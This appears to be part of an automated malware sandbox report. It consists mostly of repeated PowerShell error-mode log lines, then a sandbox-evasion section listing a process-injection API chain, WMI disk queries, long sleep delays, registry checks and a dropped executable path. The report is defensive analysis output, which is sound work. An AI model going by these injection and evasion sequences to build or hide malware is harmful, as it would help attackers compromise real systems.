Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,14_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5850Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3878Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6827Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 648Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1953Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7917Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 418Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 864Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5377Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1478Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8786Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 389Jump to behavior
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1427Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1345Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1333Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1301Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1273Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1321Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1409Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1409Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1379Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1377Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5444Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4307Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1349
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1343
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1341
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1332
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1355
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1347
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1347
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1345
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1313
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 388
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1266
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1357
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\$nya-onimai2\IhrFKM.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_14-612
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_14-615
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-574
Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.7 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 2.9 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 | Thread sleep count: 5850 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 | Thread sleep count: 3878 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7716 | Thread sleep count: 6827 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7716 | Thread sleep time: -6827000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7720 | Thread sleep count: 648 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7720 | Thread sleep time: -64800s >= -30000s
